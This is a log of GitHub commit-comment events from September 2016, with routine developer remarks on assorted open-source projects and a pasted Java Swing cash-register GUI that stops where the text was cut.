{"id":"4517270472","type":"CommitCommentEvent","actor":{"login":"luisecastro"},"repo":{"name":"luisecastro/maze_runner_mdp"},"payload":{"comment":{"id":18901135,"position":null,"line":null,"path":null,"commit_id":"410204393b7d705b0477b43cb6e90c1bf21b297d","created_at":"2016-09-05T14:45:41Z","updated_at":"2016-09-05T14:45:41Z","body":"test: testing code, breadth first search"}},"created_at":"2016-09-05T14:45:41Z"}
{"id":"4517273573","type":"CommitCommentEvent","actor":{"login":"WilliamBruneau"},"repo":{"name":"WilliamBruneau/miasm"},"payload":{"comment":{"id":18901145,"position":null,"line":null,"path":null,"commit_id":"9b3d3d9b1da6f9bd022f3cca645d9425084d154f","created_at":"2016-09-05T14:46:22Z","updated_at":"2016-09-05T14:46:22Z","body":"Use of `[:arch_size]` when `ExprInt` is too big comming..."}},"created_at":"2016-09-05T14:46:22Z"}
{"id":"4517278234","type":"CommitCommentEvent","actor":{"login":"rom1504"},"repo":{"name":"feross/webtorrent"},"payload":{"comment":{"id":18901161,"position":35,"line":27,"path":"CONTRIBUTING.md","commit_id":"8d698bd5fcff9b8ff46a0fd08e52c0a2286482ef","created_at":"2016-09-05T14:47:26Z","updated_at":"2016-09-05T14:47:26Z","body":"Oh, why was the mention and link to open open source removed ? It seemed like an interesting concept."}},"created_at":"2016-09-05T14:47:26Z"}
{"id":"4517278440","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18901162,"position":92,"line":284,"path":"resources/qml/Preferences/ProfilesPage.qml","commit_id":"a2f478f2ad9df16e62f40406cf913957d3fac3f1","created_at":"2016-09-05T14:47:29Z","updated_at":"2016-09-05T14:47:29Z","body":"Note that objectName is a predefined property of QObject. So objectName would not work."}},"created_at":"2016-09-05T14:47:29Z"}
{"id":"4517284022","type":"CommitCommentEvent","actor":{"login":"moteus"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":18901168,"position":17,"line":261,"path":"resources/install/scripts/intercept.lua","commit_id":"15fbc21b4d5dbb2dee9e39308801188150d2c3b7","created_at":"2016-09-05T14:48:39Z","updated_at":"2016-09-05T14:48:39Z","body":"1. It should intercept only outbound leg. At least by default.\r\n2. There no order in checks. It just use sql query and fetch first row.\r\nSorry. May be I do not understand what you whant.\r\nBy default if some one call to extension e.g. 100 then other extension\r\ncan dial `*8` and pickup this call. But if extension 100 calls to some external\r\nnumber it should not be intercepted. If you need intercept such calls better\r\njust set `all` as first argument to intercept_group.lua in dialplan.\r\n\r\n\r\n"}},"created_at":"2016-09-05T14:48:39Z"}
{"id":"4517286580","type":"CommitCommentEvent","actor":{"login":"gauravmak"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":18901173,"position":4,"line":155,"path":"config/app.php","commit_id":"da662e40ec5b464b64188dbe650b668f08be0b72","created_at":"2016-09-05T14:49:08Z","updated_at":"2016-09-05T14:49:08Z","body":"@taylorotwell I didn't get why is this commented out. Do we need to keep this commented while upgrading to 5.3 from 5.2?"}},"created_at":"2016-09-05T14:49:08Z"}
{"id":"4517289225","type":"CommitCommentEvent","actor":{"login":"Ken-Lo"},"repo":{"name":"gocardless/splash-pages"},"payload":{"comment":{"id":18901177,"position":null,"line":null,"path":null,"commit_id":"4e6292a308e64ca53da8537b7f205131ec9444fc","created_at":"2016-09-05T14:49:47Z","updated_at":"2016-09-05T14:49:47Z","body":"@sjnorth Thanks, just doing a manual re-build now!"}},"created_at":"2016-09-05T14:49:47Z"}
{"id":"4517289241","type":"CommitCommentEvent","actor":{"login":"aidylewis"},"repo":{"name":"aidylewis/hyper-h2"},"payload":{"comment":{"id":18901178,"position":14,"line":313,"path":"h2/utilities.py","commit_id":"03124fb35efd64a53f7c086bae3503502b9811dc","created_at":"2016-09-05T14:49:47Z","updated_at":"2016-09-05T14:49:47Z","body":"@Lukasa Should I initialise```is_response_header``` to False in ```_build_hdr_validation_flags``` and to True in ```send_headers``` ?"}},"created_at":"2016-09-05T14:49:47Z"}
{"id":"4517290311","type":"CommitCommentEvent","actor":{"login":"ocefpaf"},"repo":{"name":"conda-forge/staged-recipes"},"payload":{"comment":{"id":18901181,"position":16,"line":19,"path":"recipes/hyperion-fortran/run_test.sh","commit_id":"8a7fe0a0b2e69e4dc3d177c4e5d265d294b90ee0","created_at":"2016-09-05T14:50:01Z","updated_at":"2016-09-05T14:50:01Z","body":"@astrofrog see the [gitter](https://gitter.im/conda-forge/conda-forge.github.io) discussion about `mpi` and `mpich`.\r\n\r\nYou opinion is welcomed there!"}},"created_at":"2016-09-05T14:50:01Z"}
{"id":"4517290467","type":"CommitCommentEvent","actor":{"login":"mpoapostolis"},"repo":{"name":"mpoapostolis/Diathymia"},"payload":{"comment":{"id":18901183,"position":null,"line":null,"path":null,"commit_id":"323add8584d25d78a100d1a335e4209ba893164a","created_at":"2016-09-05T14:50:03Z","updated_at":"2016-09-05T14:50:03Z","body":"**dom is slow** change all the first page"}},"created_at":"2016-09-05T14:50:03Z"}
{"id":"4517291457","type":"CommitCommentEvent","actor":{"login":"sjnorth"},"repo":{"name":"gocardless/splash-pages"},"payload":{"comment":{"id":18901186,"position":null,"line":null,"path":null,"commit_id":"4e6292a308e64ca53da8537b7f205131ec9444fc","created_at":"2016-09-05T14:50:17Z","updated_at":"2016-09-05T14:50:17Z","body":"@Ken-Lo :)"}},"created_at":"2016-09-05T14:50:17Z"}
{"id":"4517291579","type":"CommitCommentEvent","actor":{"login":"luca020400"},"repo":{"name":"Rashed97/android_hardware_qcom_audio"},"payload":{"comment":{"id":18901187,"position":4,"line":76,"path":"hal/audio_hw.c","commit_id":"a9eeb02072176977d81b3958976cd6fb9722505b","created_at":"2016-09-05T14:50:18Z","updated_at":"2016-09-05T14:50:18Z","body":"New line"}},"created_at":"2016-09-05T14:50:18Z"}
{"id":"4517294781","type":"CommitCommentEvent","actor":{"login":"Lukasa"},"repo":{"name":"aidylewis/hyper-h2"},"payload":{"comment":{"id":18901199,"position":14,"line":313,"path":"h2/utilities.py","commit_id":"03124fb35efd64a53f7c086bae3503502b9811dc","created_at":"2016-09-05T14:50:59Z","updated_at":"2016-09-05T14:50:59Z","body":"@aidylewis Nope: namedtuples are immutable. You should pass whatever additional information is required into `_build_hdr_validation_flags`."}},"created_at":"2016-09-05T14:50:59Z"}
{"id":"4517298582","type":"CommitCommentEvent","actor":{"login":"LionsAd"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18901205,"position":null,"line":null,"path":null,"commit_id":"b512f4a95614891a512b0da674c1a9d22a40869e","created_at":"2016-09-05T14:51:47Z","updated_at":"2016-09-05T14:51:47Z","body":"It would be really nice to backport this to PHP 5.6, too."}},"created_at":"2016-09-05T14:51:47Z"}
{"id":"4517298950","type":"CommitCommentEvent","actor":{"login":"otacke"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":18901207,"position":null,"line":null,"path":null,"commit_id":"ed40775cb17f1fb2dd71809d18d5b40a96ba2249","created_at":"2016-09-05T14:51:52Z","updated_at":"2016-09-05T14:51:52Z","body":"Oooh, so that's possible with CSS :-D"}},"created_at":"2016-09-05T14:51:52Z"}
{"id":"4517299141","type":"CommitCommentEvent","actor":{"login":"let-def"},"repo":{"name":"let-def/Reason"},"payload":{"comment":{"id":18901208,"position":7,"line":42,"path":"src/ocamlmerlin_reason.ml","commit_id":"361a319a8785084d32b7bbb4d2e6e5f17da58bab","created_at":"2016-09-05T14:51:54Z","updated_at":"2016-09-05T14:51:54Z","body":"I don't remember this piece, but I think it was that. You can ignore."}},"created_at":"2016-09-05T14:51:54Z"}
{"id":"4517304220","type":"CommitCommentEvent","actor":{"login":"tuanca58"},"repo":{"name":"ducanhk58uet/int3117-2016"},"payload":{"comment":{"id":18901219,"position":null,"line":null,"path":null,"commit_id":"9ba1c1aec08ad8c9bdae979020b1c9c0e62580e4","created_at":"2016-09-05T14:53:01Z","updated_at":"2016-09-05T14:53:01Z","body":"asd"}},"created_at":"2016-09-05T14:53:01Z"}
{"id":"4517304440","type":"CommitCommentEvent","actor":{"login":"ervinallko"},"repo":{"name":"ervinallko/vigilant-enigma"},"payload":{"comment":{"id":18901220,"position":null,"line":null,"path":null,"commit_id":"e51db89abeba600091a93d06b171a6d138f0cc60","created_at":"2016-09-05T14:53:05Z","updated_at":"2016-09-05T14:53:05Z","body":"### "}},"created_at":"2016-09-05T14:53:05Z"}
{"id":"4517305056","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-enterprise"},"payload":{"comment":{"id":18901222,"position":7,"line":417,"path":"xwiki-enterprise-test/xwiki-enterprise-test-wysiwyg/src/test/it/org/xwiki/test/wysiwyg/ImageTest.java","commit_id":"916f28fce24ee68f43936107fac04ddd702ce5d0","created_at":"2016-09-05T14:53:14Z","updated_at":"2016-09-05T14:53:14Z","body":"The official way to do this is:\r\n\r\n    @see <a href=\"http://jira.xwiki.org/jira/browse/XWIKI-3784\">XWIKI-3784</a>"}},"created_at":"2016-09-05T14:53:14Z"}
{"id":"4517307741","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18901228,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-05T14:53:50Z","updated_at":"2016-09-05T14:53:50Z","body":"> Why is this better?\r\n\r\nBecause the previous one does not work."}},"created_at":"2016-09-05T14:53:50Z"}
{"id":"4517309680","type":"CommitCommentEvent","actor":{"login":"inducer"},"repo":{"name":"conda-forge/libhwloc-feedstock"},"payload":{"comment":{"id":18901233,"position":null,"line":null,"path":null,"commit_id":"f2e6ce14beeebfe3047f68af721c398fb293ed10","created_at":"2016-09-05T14:54:16Z","updated_at":"2016-09-05T14:54:16Z","body":"@msarahan (just picked you at random, sorry) Are these tokens supposed to be public?"}},"created_at":"2016-09-05T14:54:16Z"}
{"id":"4517310171","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18901234,"position":null,"line":null,"path":null,"commit_id":"b472b446fb38d4d2467e59820311619b6d52b902","created_at":"2016-09-05T14:54:21Z","updated_at":"2016-09-05T14:54:21Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read](http://github.com/weidai11/cryptopp/issues/252)"}},"created_at":"2016-09-05T14:54:21Z"}
{"id":"4517310931","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901237,"position":null,"line":null,"path":null,"commit_id":"9ee436d611678c5b662cf8c0683ad286610c48b0","created_at":"2016-09-05T14:54:30Z","updated_at":"2016-09-05T14:54:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#WvC9kMhmS2aUw3MNNi5Mjg"}},"created_at":"2016-09-05T14:54:30Z"}
{"id":"4517311183","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18901238,"position":null,"line":null,"path":null,"commit_id":"ea02dc0b945237d8743ebf0d549f103612be63d6","created_at":"2016-09-05T14:54:33Z","updated_at":"2016-09-05T14:54:33Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read](http://github.com/weidai11/cryptopp/issues/252)"}},"created_at":"2016-09-05T14:54:33Z"}
{"id":"4517313081","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18901242,"position":null,"line":null,"path":null,"commit_id":"0bc85ca42fe6849189fa8033357b65f71eea81ec","created_at":"2016-09-05T14:54:58Z","updated_at":"2016-09-05T14:54:58Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read](http://github.com/weidai11/cryptopp/issues/252)."}},"created_at":"2016-09-05T14:54:58Z"}
{"id":"4517314217","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18901244,"position":null,"line":null,"path":null,"commit_id":"88bc98fa2507eef8597c2030be9643c9f55ad004","created_at":"2016-09-05T14:55:15Z","updated_at":"2016-09-05T14:55:15Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read](http://github.com/weidai11/cryptopp/issues/252)."}},"created_at":"2016-09-05T14:55:15Z"}
{"id":"4517314490","type":"CommitCommentEvent","actor":{"login":"JamesEBartlett"},"repo":{"name":"JamesEBartlett/dotprobe-ET"},"payload":{"comment":{"id":18901245,"position":null,"line":null,"path":null,"commit_id":"3b28292ac3b49c98befd067fefa3317d81c3d7dc","created_at":"2016-09-05T14:55:18Z","updated_at":"2016-09-05T14:55:18Z","body":"To do\r\n\r\n- Need to remove the break at the end\r\n\r\n- Make images more central\r\n\r\n- End of break message neater \r\n\r\n- Add filler images for neutral-neutral trials"}},"created_at":"2016-09-05T14:55:18Z"}
{"id":"4517315393","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18901248,"position":null,"line":null,"path":null,"commit_id":"5057991a31bae69d0ff4bcfe3f9c47f2fb210242","created_at":"2016-09-05T14:55:29Z","updated_at":"2016-09-05T14:55:29Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read](http://github.com/weidai11/cryptopp/issues/252)."}},"created_at":"2016-09-05T14:55:29Z"}
{"id":"4517319417","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":18901257,"position":null,"line":null,"path":null,"commit_id":"a260a2d92e0a5b8700fdcdfe1887386119421c73","created_at":"2016-09-05T14:56:21Z","updated_at":"2016-09-05T14:56:21Z","body":"Can anybody say me what is the frequency for MODE_LONGDATA_FAST_LOWPOWER and MODE_LONGDATA_RANGE_ACCURACY?"}},"created_at":"2016-09-05T14:56:21Z"}
{"id":"4517320783","type":"CommitCommentEvent","actor":{"login":"aidylewis"},"repo":{"name":"aidylewis/hyper-h2"},"payload":{"comment":{"id":18901262,"position":14,"line":313,"path":"h2/utilities.py","commit_id":"03124fb35efd64a53f7c086bae3503502b9811dc","created_at":"2016-09-05T14:56:38Z","updated_at":"2016-09-05T14:56:38Z","body":"@Lukasa And how would I know if I am dealing with a response header? "}},"created_at":"2016-09-05T14:56:38Z"}
{"id":"4517320792","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":18901261,"position":104,"line":127,"path":"Mopy/bash/game/fallout4/constants.py","commit_id":"63e43096b032765deb15f5520710c80159f0e140","created_at":"2016-09-05T14:56:38Z","updated_at":"2016-09-05T14:56:38Z","body":"Was BA2 support added?"}},"created_at":"2016-09-05T14:56:38Z"}
{"id":"4517322067","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":18901266,"position":null,"line":null,"path":null,"commit_id":"94458f6274bb8cd7cd26741531aaf4804bcf0e9c","created_at":"2016-09-05T14:56:53Z","updated_at":"2016-09-05T14:56:53Z","body":"Can anybody say me what is the frequency for MODE_LONGDATA_FAST_LOWPOWER and MODE_LONGDATA_RANGE_ACCURACY?"}},"created_at":"2016-09-05T14:56:53Z"}
{"id":"4517322239","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18901267,"position":25,"line":25,"path":"debug.cc","commit_id":"6f2eddcad036b5e6feb51fab525d7bdafe426986","created_at":"2016-09-05T14:56:56Z","updated_at":"2016-09-05T14:56:56Z","body":"The prefix would not be informative, because every debugger already knows the name of the service, so I think it's up to client (of debug interface)  to add a prefix.\r\nBoth debugger (empathy and KTp) shows the log in a tab, named after CM, so we would have tab \"Nonsense\" either way.\r\nMay be it would make sense to introduce logging categories, so we would have different domains, e.g. \"nonsense\" (for our own code), \"qxmpp\", \"telepathy-qt\" and so on. Drop of Qt4 support in TpQt gives a green light for logging categories, but it is not in my list of \"high priority tasks\"."}},"created_at":"2016-09-05T14:56:56Z"}
{"id":"4517325819","type":"CommitCommentEvent","actor":{"login":"pameyer"},"repo":{"name":"sbgrid/data-capture-module"},"payload":{"comment":{"id":18901276,"position":null,"line":null,"path":null,"commit_id":"f2909586b002bfa5ba83a86d6421834ef4e25298","created_at":"2016-09-05T14:57:45Z","updated_at":"2016-09-05T14:57:45Z","body":"good catch.\r\n\r\nnow we do."}},"created_at":"2016-09-05T14:57:45Z"}
{"id":"4517326595","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":18901283,"position":null,"line":null,"path":null,"commit_id":"9043b097d024c2856c7c11f0db4d944d7ce9c66f","created_at":"2016-09-05T14:57:55Z","updated_at":"2016-09-05T14:57:55Z","body":"Can anybody say me what is the frequency for MODE_LONGDATA_FAST_LOWPOWER and MODE_LONGDATA_RANGE_ACCURACY?"}},"created_at":"2016-09-05T14:57:55Z"}
{"id":"4517328571","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18901286,"position":null,"line":null,"path":null,"commit_id":"6f2eddcad036b5e6feb51fab525d7bdafe426986","created_at":"2016-09-05T14:58:20Z","updated_at":"2016-09-05T14:58:20Z","body":"I would make Debug class then."}},"created_at":"2016-09-05T14:58:20Z"}
{"id":"4517328601","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":18901287,"position":null,"line":null,"path":null,"commit_id":"b4eefd6a7199f7abcee41e5183f9305d699a10fb","created_at":"2016-09-05T14:58:20Z","updated_at":"2016-09-05T14:58:20Z","body":"Can anybody say me what is the frequency for MODE_LONGDATA_FAST_LOWPOWER and MODE_LONGDATA_RANGE_ACCURACY?"}},"created_at":"2016-09-05T14:58:20Z"}
{"id":"4517329640","type":"CommitCommentEvent","actor":{"login":"Lukasa"},"repo":{"name":"aidylewis/hyper-h2"},"payload":{"comment":{"id":18901290,"position":14,"line":313,"path":"h2/utilities.py","commit_id":"03124fb35efd64a53f7c086bae3503502b9811dc","created_at":"2016-09-05T14:58:34Z","updated_at":"2016-09-05T14:58:34Z","body":"For receiving, it's easy: the events passed to `hdr_validation_flags` will include a `ResponseReceived` event. For sending it's a bit harder, but you can probably get it by splitting the internal-only `_HeadersSent` event into `_RequestSent` and `_ResponseSent` events."}},"created_at":"2016-09-05T14:58:34Z"}
{"id":"4517330657","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18901291,"position":5,"line":163,"path":"xwiki-platform-tools/xwiki-platform-tool-packager-plugin/src/main/java/org/xwiki/tool/packager/PackageMojo.java","commit_id":"f70c18544967eb7c92759965d694ff12701c5938","created_at":"2016-09-05T14:58:48Z","updated_at":"2016-09-05T14:58:48Z","body":"You missed a commit. The previous version commit from a commit I right before this one. There is not reason to use \"property\" here."}},"created_at":"2016-09-05T14:58:48Z"}
{"id":"4517334274","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18901300,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-05T14:59:36Z","updated_at":"2016-09-05T14:59:36Z","body":"hmm I'll need to check in the maven-based javadoc generation because in my IDE it's the opposite, the last version you put doesn't work, see image: https://www.evernote.com/l/AHe8ZIdOdw1DQphkSyfKSSWhWPY-N0kEQAQ\r\n\r\n"}},"created_at":"2016-09-05T14:59:36Z"}
{"id":"4517336409","type":"CommitCommentEvent","actor":{"login":"shanzhashu"},"repo":{"name":"cnpack/cnwizards"},"payload":{"comment":{"id":18901306,"position":null,"line":null,"path":null,"commit_id":"25822d2e46a2e3557fc25be3dfdf151e452cbbbd","created_at":"2016-09-05T15:00:06Z","updated_at":"2016-09-05T15:00:06Z","body":"The latest commit implements this feature, to test."}},"created_at":"2016-09-05T15:00:06Z"}
{"id":"4517345325","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901326,"position":null,"line":null,"path":null,"commit_id":"5b333e9aa181780abfb93558305f38bd1737d89e","created_at":"2016-09-05T15:01:59Z","updated_at":"2016-09-05T15:01:59Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Ki7_KDMYS7yX_SClYC4_tg"}},"created_at":"2016-09-05T15:01:59Z"}
{"id":"4517346897","type":"CommitCommentEvent","actor":{"login":"rrrrrrrina"},"repo":{"name":"Crusader197/SigmaProject"},"payload":{"comment":{"id":18901327,"position":1,"line":1,"path":"README.md","commit_id":"a32da5aef0b066d721ca88264a79c088b5408567","created_at":"2016-09-05T15:02:21Z","updated_at":"2016-09-05T15:02:21Z","body":"\r\npackage point.of.sales;\r\n\r\nimport javax.swing.JOptionPane;\r\nimport java.text.DecimalFormat;\r\n\r\npublic class CashRegister extends javax.swing.JFrame {\r\n\r\n    public CashRegister() {\r\n        initComponents();\r\n    }\r\n\r\n    void initializeBill()\r\n    {\r\n        nTotal = 0;\r\n        txtBill.setText(spaces(35) ); //얘가 없으면 왜 새로운Order이 안되는거?\r\n        btnTomatoBasilLinguine.setEnabled(true);\r\n        btnLinguineCarbonara.setEnabled(true);\r\n        btnShrimpPasta.setEnabled(true);\r\n        btnGrilledSalmonSalad.setEnabled(true);\r\n        btnCapreseSalad.setEnabled(true);\r\n        btnCoke.setEnabled(true);\r\n        btnGingerale.setEnabled(true);\r\n    }\r\n    // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">                          \r\n    private void initComponents() {\r\n\r\n        jPanel5 = new javax.swing.JPanel();\r\n        jTabbedPane1 = new javax.swing.JTabbedPane();\r\n        jPanel7 = new javax.swing.JPanel();\r\n        jPanel1 = new javax.swing.JPanel();\r\n        btnCheeseSalad = new javax.swing.JButton();\r\n        btnGrilledSalmonSalad = new javax.swing.JButton();\r\n        btnCapreseSalad = new javax.swing.JButton();\r\n        jPanel2 = new javax.swing.JPanel();\r\n        btnNewOrder = new javax.swing.JButton();\r\n        btnCancel = new javax.swing.JButton();\r\n        btnPayment = new javax.swing.JButton();\r\n        jScrollPane1 = new javax.swing.JScrollPane();\r\n        txtBill = new javax.swing.JTextArea();\r\n        jTextField1 = new javax.swing.JTextField();\r\n        jPanel8 = new javax.swing.JPanel();\r\n        btnShrimpPasta = new javax.swing.JButton();\r\n        btnTomatoBasilLinguine = new javax.swing.JButton();\r\n        btnLinguineCarbonara = new javax.swing.JButton();\r\n        jPanel9 = new javax.swing.JPanel();\r\n        btnBeer = new javax.swing.JButton();\r\n        btnCoke = new javax.swing.JButton();\r\n        btnGingerale = new javax.swing.JButton();\r\n        jButton1 = new javax.swing.JButton();\r\n\r\n        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\r\n\r\n        jPanel1.setBorder(javax.swing.BorderFactory.createEtchedBorder());\r\n\r\n        btnCheeseSalad.setText(\"Cheese Salad\");\r\n        btnCheeseSalad.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnCheeseSaladActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        btnGrilledSalmonSalad.setText(\"Grilled Salmon Salad\");\r\n        btnGrilledSalmonSalad.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnGrilledSalmonSaladActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        btnCapreseSalad.setText(\"Caprese Salad\");\r\n        btnCapreseSalad.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnCapreseSaladActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);\r\n        jPanel1.setLayout(jPanel1Layout);\r\n        jPanel1Layout.setHorizontalGroup(\r\n            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel1Layout.createSequentialGroup()\r\n                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)\r\n                    .addComponent(btnCheeseSalad, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)\r\n                    .addComponent(btnGrilledSalmonSalad, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.DEFAULT_SIZE, 167, Short.MAX_VALUE))\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)\r\n                .addComponent(btnCapreseSalad, javax.swing.GroupLayout.PREFERRED_SIZE, 168, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))\r\n        );\r\n        jPanel1Layout.setVerticalGroup(\r\n            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel1Layout.createSequentialGroup()\r\n                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)\r\n                    .addComponent(btnGrilledSalmonSalad, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                    .addComponent(btnCapreseSalad, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE))\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)\r\n                .addComponent(btnCheeseSalad, javax.swing.GroupLayout.PREFERRED_SIZE, 43, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                .addContainerGap(40, Short.MAX_VALUE))\r\n        );\r\n\r\n        jPanel2.setBorder(javax.swing.BorderFactory.createEtchedBorder());\r\n\r\n        btnNewOrder.setText(\"New Order\");\r\n        btnNewOrder.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnNewOrderActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        btnCancel.setText(\"Cancel\");\r\n        btnCancel.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnCancelActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        btnPayment.setText(\"Payment\");\r\n        btnPayment.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                btnPaymentActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        txtBill.setColumns(20);\r\n        txtBill.setRows(5);\r\n        jScrollPane1.setViewportView(txtBill);\r\n\r\n        javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2);\r\n        jPanel2.setLayout(jPanel2Layout);\r\n        jPanel2Layout.setHorizontalGroup(\r\n            jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(jPanel2Layout.createSequentialGroup()\r\n                .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING)\r\n                    .addGroup(jPanel2Layout.createSequentialGroup()\r\n                        .addComponent(btnNewOrder, javax.swing.GroupLayout.PREFERRED_SIZE, 97, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED, 14, Short.MAX_VALUE)\r\n                        .addComponent(btnPayment)\r\n                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)\r\n                        .addComponent(btnCancel, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE))\r\n                    .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, 283, javax.swing.GroupLayout.PREFERRED_SIZE))\r\n                .addGap(0, 7, Short.MAX_VALUE))\r\n        );\r\n        jPanel2Layout.setVerticalGroup(\r\n            jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\r\n            .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel2Layout.createSequentialGroup()\r\n                .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 362, Short.MAX_VALUE)\r\n                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)\r\n                .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)\r\n                    .addComponent(btnNewOrder, javax.swing.GroupLayout.PREFERRED_SIZE, 39, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                    .addComponent(btnCancel, javax.swing.GroupLayout.PREFERRED_SIZE, 39, javax.swing.GroupLayout.PREFERRED_SIZE)\r\n                    .addComponent(btnPayment, javax.swing.GroupLayout.PREFERRED_SIZE, 39, javax.swing.GroupLayout.PREFERRED_SIZE))\r\n                .addContainerGap())\r\n        );\r\n\r\n        jTextField1.setHorizontalAlignment(javax.swing.JTextField.CENTER);\r\n        jTextField1.setText(\"Tasting Room\");\r\n        jTextField1.addActionListener(new java.awt.event.ActionListener() {\r\n            public void actionPerformed(java.awt.event.ActionEvent evt) {\r\n                jTextField1ActionPerformed(evt);\r\n            }\r\n        });\r\n\r\n        